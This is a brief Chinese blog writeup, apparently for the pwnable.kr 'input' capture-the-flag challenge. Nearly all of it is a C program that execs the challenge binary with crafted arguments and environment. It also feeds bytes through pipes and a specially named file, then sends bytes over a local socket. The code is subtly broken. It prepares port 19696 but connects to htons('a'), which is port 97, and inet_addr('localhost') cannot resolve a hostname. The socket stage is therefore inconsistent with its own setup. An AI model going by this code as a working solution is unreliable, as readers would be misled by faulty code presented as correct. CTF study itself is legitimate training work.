[Pwnable.kr] input

22. 二月 2016 pwnable writeup 0

很麻烦的题目,execve传参和环境变量、文件描述符重定向、管道、socket等,没啥好说的。

#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <string.h>
#include <arpa/inet.h>

int main() {
	system("ln -s /home/input/flag ./flag");
	// for stage 1
	char* argv[101];
	memset(argv, 0, sizeof(argv));
	int i;
	for (i = 0; i < 100; i++) {
		argv[i] = "a";
	}
	argv['A'] = "\x00";
	argv['B'] = "\x20\x0a\x0d";
	argv['C'] = "19696";	// this is prepared for stage 5

	// for stage 3
	char *env[2] = {"\xde\xad\xbe\xef=\xca\xfe\xba\xbe"};

	//for stage 4
	FILE *fp;
	if ((fp = fopen("\x0a", "w")) == NULL) {
		printf("open file error\n");
		return 0;
	}
	fwrite("\x00\x00\x00\x00", 4, 1, fp);
	fclose(fp);

	//for stage 2
	int pipe0[2], pipe2[2];
	if (pipe(pipe0) == -1 || pipe(pipe2) == -1) {
		printf("pipe error\n");
		return 0;
	}

	if (!fork()) {
		dup2(pipe0[0], 0);
		dup2(pipe2[0], 2);
		execve("/home/input/input", argv, env);	
	}
	else {
		// for stage 2
		write(pipe0[1], "\x00\x0a\x00\xff", 4);
		write(pipe2[1], "\x00\x0a\x02\xff", 4);

		// for stage 5
		sleep(5);
		struct sockaddr_in saddr;
		int sock = socket(AF_INET, SOCK_STREAM, 0);
		if (sock == -1) {
			printf("socket error\n");
			return 0;
		}
		saddr.sin_family = AF_INET;
		saddr.sin_port = htons('a');
		saddr.sin_addr.s_addr = inet_addr("localhost");
		connect(sock, (struct sockaddr *)&saddr, sizeof(saddr));
		send(sock, "\xde\xad\xbe\xef", 4, 0);
	}
	return 0;
}

 


发表评论

电子邮件地址不会被公开。 必填项已用*标注

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据